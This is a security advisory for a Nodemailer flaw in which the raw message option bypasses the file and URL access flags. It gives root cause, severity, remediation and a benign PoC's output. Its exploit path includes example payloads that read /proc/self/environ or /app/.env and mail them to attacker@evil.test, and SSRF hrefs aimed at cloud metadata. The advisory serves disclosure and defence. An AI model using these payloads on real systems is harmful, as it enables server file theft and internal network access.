GHSA-P6GQ-J5CR-W38F
Vulnerability from github – Published: 2026-06-18 14:28 – Updated: 2026-06-18 14:28Message-level raw option bypasses disableFileAccess / disableUrlAccess, enabling arbitrary file read and full-response SSRF in the sent message
- Target: nodemailer/nodemailer, npm
nodemailerv9.0.0 (HEAD4e58450eb490e5097a74b2b2cce35a8d9e21856e) - Verdict: CONFIRMED (local PoC, no network)
Summary
Nodemailer exposes disableFileAccess and disableUrlAccess so an application that passes
untrusted message data to the library can forbid that data from reading local files or
fetching URLs. Every attachment, alternative, html/text/watchHtml/amp and icalEvent
content node honors these flags. The message-level raw option does not.
MailComposer.compile() builds the root MIME node for a raw message without threading the
two flags, so a raw: { path: '/etc/passwd' } or raw: { href: 'http://169.254.169.254/…' }
message is read / fetched anyway, and the file or HTTP-response bytes become the actual
message that is sent by every transport (SMTP, SES, sendmail, stream, JSON). An actor whose
input the application intended to sandbox therefore obtains arbitrary local-file disclosure and
a full-response SSRF primitive, delivered to a recipient the same actor can choose.
This is the same vulnerability class as the already-published jsonTransport advisory
GHSA-wqvq-jvpq-h66f, but a distinct code path (raw root node, not normalize()), and
strictly higher impact: the jsonTransport bug only affected the locally-returned JSON, whereas
this affects the delivered RFC822 message for all transports.
Affected component
lib/mail-composer/index.js:34-35— root cause:js if (this.mail.raw) { this.message = new MimeNode('message/rfc822', { newline: this.mail.newline }).setRaw(this.mail.raw); }TheMimeNodeis constructed with only{ newline }. Compare the sibling node builders_createMixed/_createAlternative/_createRelated/_createContentNode(lib/mail-composer/index.js:389-527), which all passdisableUrlAccess: this.mail.disableUrlAccess, disableFileAccess: this.mail.disableFileAccess.lib/mime-node/index.js:51-52— the constructor derivesthis.disableFileAccess/this.disableUrlAccesssolely from its ownoptions; children do not inherit a parent's flags (createChild/appendChild, lines 175-194, pass options through verbatim).lib/mime-node/index.js:812—setRaw()content is resolved throughthis._getStream(this._raw).lib/mime-node/index.js:984-1010—_getStreamreads the file (fs.createReadStream, 995) or fetches the URL (nmfetch, 1009) only guarded bythis.disableFileAccess/this.disableUrlAccess, which on therawroot node arefalse.- Reached from the normal send flow at
lib/mailer/index.js:188(mail.message = new MailComposer(mail.data).compile()), so every transport is affected.
Reachability gate (hop-by-hop)
- Source. Application calls
transporter.sendMail({ raw: <userControlled> , to: <userControlled> })withdisableFileAccess: trueand/ordisableUrlAccess: trueconfigured on the transporter (forced ontomail.datainlib/mailer/mail-message.js:36-40) or per message. This is the exact scenario the flags exist for — the same precondition under which GHSA-wqvq-jvpq-h66f was accepted. - Guard — the access flags. For attachments the flag is enforced: a node created by
_createContentNodecarriesdisableFileAccess, so_getStreamthrowsEFILEACCESS. Bypass: therawbranch (compile():34-35) never sets the flag on its node, sothis.disableFileAccess === falseand the guard atmime-node:985/:999is skipped. There is no other validation betweenmail.rawand the read;rawcontent shapes ({path},{href}, stream, string, buffer) are accepted as-is bysetRaw/_getStream. - Sink.
fs.createReadStream(content.path)(file disclosure) ornmfetch(content.href, …)(SSRF). The resulting bytes are emitted as the message body bycreateReadStream(), which every transport pipes to its destination (smtp-transport:233,smtp-pool/pool-resource:208,ses-transport:96,sendmail-transport:184,stream-transport:67).
No guard blocks the chain; the only guard (the access flags) is structurally absent on this node.
Root cause
Inconsistent enforcement: the access policy is applied per-MimeNode via constructor options and
must be re-passed at every node creation. The raw-message shortcut in compile() omits it,
while all five other node builders include it. The flags are therefore enforced for every content
type except the one that lets the caller supply a complete message body by path/URL.
Exploit path
Application that sandboxes untrusted mail input (disableFileAccess/disableUrlAccess set):
- Untrusted actor supplies
raw: { path: '/proc/self/environ' }(or any server file:/app/.env, key material, etc.) andto: attacker@evil.test. compile()builds the raw root node without the flags; the transport reads the file and sends its contents as the message → arbitrary server-file exfiltration to an attacker-chosen mailbox.- Alternatively
raw: { href: 'http://127.0.0.1:8080/admin' }or a cloud metadata URL → Nodemailer fetches it server-side and delivers the full response body in the email → full-response SSRF (no blind-channel limitation).
Impact
- Confidentiality (High): arbitrary local file read disclosed in the outgoing message; full-response SSRF to internal/metadata endpoints, also disclosed in the message.
- Integrity (Low): attacker-fetched/file content is injected into the delivered mail.
- The two protective flags an application relies on to contain untrusted input are silently
ineffective for
raw.
Preconditions
The application (a) passes disableFileAccess and/or disableUrlAccess (the documented sandboxing
flags) and (b) lets untrusted input influence the raw field (and, for maximal disclosure, to).
No other configuration is required; all bundled transports are affected. This mirrors the accepted
precondition of GHSA-wqvq-jvpq-h66f.
Severity
- AV — message data routinely originates over the network in the apps these flags protect.
- AC — a single crafted
rawobject; deterministic. - PR — the actor is a user whose input the app already treats as untrusted (the reason the flags are set); not fully anonymous in the typical deployment.
- UI — no victim interaction.
- S — impact within Nodemailer's process scope.
- C — arbitrary file read and full-response SSRF, both delivered to an attacker-chosen recipient. (The sibling jsonTransport advisory used C:L because its leak stayed in locally-returned JSON; here the bytes leave the system in the sent message, so C:H is warranted.)
- I — attacker injects fetched/file bytes into the outgoing message.
- A.
Note: if a deployment fixes the recipient (
tonot attacker-controlled) the disclosure channel narrows and the rating degrades toward the sibling's Medium; the High rating reflects the reasonable worst case whererawandtoare both untrusted.
Adversarial re-read (attempts to refute)
- "
rawcontent is by-design trusted, so the flags shouldn't apply." Rejected: every other content path (attachments, alternatives, html/text, icalEvent) honors the flags, and the maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this "untrusted input + flag set" model. The asymmetry — attachment{path}is blocked butraw:{path}is not — is the bug, and the PoC's CONTROL case proves the flag is otherwise effective on the same file. - "The raw node inherits the flags via rootNode." Rejected by code and by PoC:
compile():35constructs the node with{ newline }only;MimeNodeconstructor setsthis.disableFileAccess = !!options.disableFileAccess→false;rootNodeis itself; no inheritance exists. - "The PoC leaks for an unrelated reason." Rejected: the CONTROL message (
attachments:[{path}], same file, same transporter) returnsEFILEACCESS; only theraw:{path}message leaks. The sentinel nonce exists solely in the temp file; the URL nonce is generated server-side and is only obtainable by an actual fetch. Both observables are uniquely bound to the bypass. - "Maybe only jsonTransport (already reported) is affected." Rejected: the PoC uses
streamTransportand the root cause is inMailComposer.compile()(mailer:188), shared by all transports; jsonTransport is a different (already-fixed) path.
I could not find any guard that blocks the chain; the finding survives.
Proof of concept (safe, benign)
findings/nodemailer/raw/poc-raw-fileaccess-bypass.js — local, no network egress (loopback only),
no destructive action. Output:
[CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here
[ATTACK] raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message
[ATTACK] raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF)
VERDICT: CONFIRMED
Run: node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js (exit 0 = confirmed).
Remediation
Thread the access policy onto the raw root node, exactly as the other builders do:
if (this.mail.raw) {
this.message = new MimeNode('message/rfc822', {
newline: this.mail.newline,
disableFileAccess: this.mail.disableFileAccess,
disableUrlAccess: this.mail.disableUrlAccess
}).setRaw(this.mail.raw);
}
(Defense in depth: setRaw/_getStream could also refuse {path}/{href} raw content when either
flag is set, regardless of how the node was constructed.) Add a regression test asserting that
raw:{path} and raw:{href} reject with EFILEACCESS/EURLACCESS when the flags are set, mirroring
the attachment tests.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 9.0.0"
},
"package": {
"ecosystem": "npm",
"name": "nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-73",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T14:28:05Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "# Message-level `raw` option bypasses `disableFileAccess` / `disableUrlAccess`, enabling arbitrary file read and full-response SSRF in the sent message\n\n- **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD `4e58450eb490e5097a74b2b2cce35a8d9e21856e`)\n- **Verdict:** CONFIRMED (local PoC, no network)\n\n## Summary\n\nNodemailer exposes `disableFileAccess` and `disableUrlAccess` so an application that passes\n**untrusted** message data to the library can forbid that data from reading local files or\nfetching URLs. Every attachment, alternative, `html`/`text`/`watchHtml`/`amp` and `icalEvent`\ncontent node honors these flags. **The message-level `raw` option does not.**\n\n`MailComposer.compile()` builds the root MIME node for a `raw` message **without** threading the\ntwo flags, so a `raw: { path: \u0027/etc/passwd\u0027 }` or `raw: { href: \u0027http://169.254.169.254/\u2026\u0027 }`\nmessage is read / fetched anyway, and the file or HTTP-response bytes become the **actual\nmessage that is sent** by every transport (SMTP, SES, sendmail, stream, JSON). An actor whose\ninput the application intended to sandbox therefore obtains arbitrary local-file disclosure and\na full-response SSRF primitive, delivered to a recipient the same actor can choose.\n\nThis is the same vulnerability class as the already-published jsonTransport advisory\n**GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node, not `normalize()`), and\nstrictly higher impact: the jsonTransport bug only affected the locally-returned JSON, whereas\nthis affects the delivered RFC822 message for all transports.\n\n## Affected component\n\n- `lib/mail-composer/index.js:34-35` \u2014 root cause:\n ```js\n if (this.mail.raw) {\n this.message = new MimeNode(\u0027message/rfc822\u0027, { newline: this.mail.newline }).setRaw(this.mail.raw);\n }\n ```\n The `MimeNode` is constructed with only `{ newline }`. Compare the sibling node builders\n `_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode`\n (`lib/mail-composer/index.js:389-527`), which all pass\n `disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess: this.mail.disableFileAccess`.\n- `lib/mime-node/index.js:51-52` \u2014 the constructor derives `this.disableFileAccess`/\n `this.disableUrlAccess` solely from its own `options`; children do **not** inherit a parent\u0027s\n flags (`createChild`/`appendChild`, lines 175-194, pass options through verbatim).\n- `lib/mime-node/index.js:812` \u2014 `setRaw()` content is resolved through `this._getStream(this._raw)`.\n- `lib/mime-node/index.js:984-1010` \u2014 `_getStream` reads the file (`fs.createReadStream`, 995) or\n fetches the URL (`nmfetch`, 1009) **only guarded by `this.disableFileAccess`/`this.disableUrlAccess`**,\n which on the `raw` root node are `false`.\n- Reached from the normal send flow at `lib/mailer/index.js:188`\n (`mail.message = new MailComposer(mail.data).compile()`), so every transport is affected.\n\n## Reachability gate (hop-by-hop)\n\n1. **Source.** Application calls `transporter.sendMail({ raw: \u003cuserControlled\u003e , to: \u003cuserControlled\u003e })`\n with `disableFileAccess: true` and/or `disableUrlAccess: true` configured on the transporter\n (forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per message. This is the\n exact scenario the flags exist for \u2014 the same precondition under which GHSA-wqvq-jvpq-h66f was\n accepted.\n2. **Guard \u2014 the access flags.** For attachments the flag is enforced: a node created by\n `_createContentNode` carries `disableFileAccess`, so `_getStream` throws `EFILEACCESS`.\n **Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on its node, so\n `this.disableFileAccess === false` and the guard at `mime-node:985` / `:999` is skipped.\n There is no other validation between `mail.raw` and the read; `raw` content shapes\n (`{path}`, `{href}`, stream, string, buffer) are accepted as-is by `setRaw`/`_getStream`.\n3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or\n `nmfetch(content.href, \u2026)` (SSRF). The resulting bytes are emitted as the message body by\n `createReadStream()`, which every transport pipes to its destination\n (`smtp-transport:233`, `smtp-pool/pool-resource:208`, `ses-transport:96`, `sendmail-transport:184`,\n `stream-transport:67`).\n\nNo guard blocks the chain; the only guard (the access flags) is structurally absent on this node.\n\n## Root cause\n\nInconsistent enforcement: the access policy is applied per-`MimeNode` via constructor options and\nmust be re-passed at every node creation. The `raw`-message shortcut in `compile()` omits it,\nwhile all five other node builders include it. The flags are therefore enforced for every content\ntype *except* the one that lets the caller supply a complete message body by path/URL.\n\n## Exploit path\n\nApplication that sandboxes untrusted mail input (`disableFileAccess`/`disableUrlAccess` set):\n\n1. Untrusted actor supplies `raw: { path: \u0027/proc/self/environ\u0027 }` (or any server file:\n `/app/.env`, key material, etc.) and `to: attacker@evil.test`.\n2. `compile()` builds the raw root node without the flags; the transport reads the file and sends\n its contents as the message \u2192 **arbitrary server-file exfiltration to an attacker-chosen mailbox.**\n3. Alternatively `raw: { href: \u0027http://127.0.0.1:8080/admin\u0027 }` or a cloud metadata URL \u2192\n Nodemailer fetches it server-side and delivers the full response body in the email \u2192\n **full-response SSRF** (no blind-channel limitation).\n\n## Impact\n\n- **Confidentiality (High):** arbitrary local file read disclosed in the outgoing message;\n full-response SSRF to internal/metadata endpoints, also disclosed in the message.\n- **Integrity (Low):** attacker-fetched/file content is injected into the delivered mail.\n- The two protective flags an application relies on to contain untrusted input are silently\n ineffective for `raw`.\n\n## Preconditions\n\nThe application (a) passes `disableFileAccess` and/or `disableUrlAccess` (the documented sandboxing\nflags) and (b) lets untrusted input influence the `raw` field (and, for maximal disclosure, `to`).\nNo other configuration is required; all bundled transports are affected. This mirrors the accepted\nprecondition of GHSA-wqvq-jvpq-h66f.\n\n## Severity\n\n- **AV** \u2014 message data routinely originates over the network in the apps these flags protect.\n- **AC** \u2014 a single crafted `raw` object; deterministic.\n- **PR** \u2014 the actor is a user whose input the app already treats as untrusted (the reason the\n flags are set); not fully anonymous in the typical deployment.\n- **UI** \u2014 no victim interaction.\n- **S** \u2014 impact within Nodemailer\u0027s process scope.\n- **C** \u2014 arbitrary file read **and** full-response SSRF, both delivered to an attacker-chosen\n recipient. (The sibling jsonTransport advisory used C:L because its leak stayed in locally-returned\n JSON; here the bytes leave the system in the sent message, so C:H is warranted.)\n- **I** \u2014 attacker injects fetched/file bytes into the outgoing message.\n- **A**.\nNote: if a deployment fixes the recipient (`to` not attacker-controlled) the disclosure channel\nnarrows and the rating degrades toward the sibling\u0027s Medium; the High rating reflects the\nreasonable worst case where `raw` and `to` are both untrusted.\n\n## Adversarial re-read (attempts to refute)\n\n1. **\"`raw` content is by-design trusted, so the flags shouldn\u0027t apply.\"** Rejected: every other\n content path (attachments, alternatives, html/text, icalEvent) honors the flags, and the\n maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this \"untrusted input + flag set\"\n model. The asymmetry \u2014 attachment `{path}` is blocked but `raw:{path}` is not \u2014 is the bug, and\n the PoC\u0027s CONTROL case proves the flag is otherwise effective on the same file.\n2. **\"The raw node inherits the flags via rootNode.\"** Rejected by code and by PoC: `compile():35`\n constructs the node with `{ newline }` only; `MimeNode` constructor sets\n `this.disableFileAccess = !!options.disableFileAccess` \u2192 `false`; `rootNode` is itself; no\n inheritance exists.\n3. **\"The PoC leaks for an unrelated reason.\"** Rejected: the CONTROL message (`attachments:[{path}]`,\n same file, same transporter) returns `EFILEACCESS`; only the `raw:{path}` message leaks. The\n sentinel nonce exists solely in the temp file; the URL nonce is generated server-side and is only\n obtainable by an actual fetch. Both observables are uniquely bound to the bypass.\n4. **\"Maybe only jsonTransport (already reported) is affected.\"** Rejected: the PoC uses\n `streamTransport` and the root cause is in `MailComposer.compile()` (`mailer:188`), shared by all\n transports; jsonTransport is a different (already-fixed) path.\n\nI could not find any guard that blocks the chain; the finding survives.\n\n## Proof of concept (safe, benign)\n\n`findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` \u2014 local, no network egress (loopback only),\nno destructive action. Output:\n```\n[CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) \u2014 flag works here\n[ATTACK] raw:{path} with disableFileAccess=true: BYPASSED \u2014 sentinel file CONTENT present in message\n[ATTACK] raw:{href} with disableUrlAccess=true (loopback server): BYPASSED \u2014 fetched body present (SSRF)\nVERDICT: CONFIRMED\n```\nRun: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0 = confirmed).\n\n## Remediation\n\nThread the access policy onto the `raw` root node, exactly as the other builders do:\n```js\nif (this.mail.raw) {\n this.message = new MimeNode(\u0027message/rfc822\u0027, {\n newline: this.mail.newline,\n disableFileAccess: this.mail.disableFileAccess,\n disableUrlAccess: this.mail.disableUrlAccess\n }).setRaw(this.mail.raw);\n}\n```\n(Defense in depth: `setRaw`/`_getStream` could also refuse `{path}`/`{href}` raw content when either\nflag is set, regardless of how the node was constructed.) Add a regression test asserting that\n`raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS` when the flags are set, mirroring\nthe attachment tests.",
"id": "GHSA-p6gq-j5cr-w38f",
"modified": "2026-06-18T14:28:05Z",
"published": "2026-06-18T14:28:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodemailer/nodemailer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Nodemailer: Message-level raw option bypasses disableFileAccess/disableUrlAccess, enabling arbitrary file read and full-response SSRF in the delivered message"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.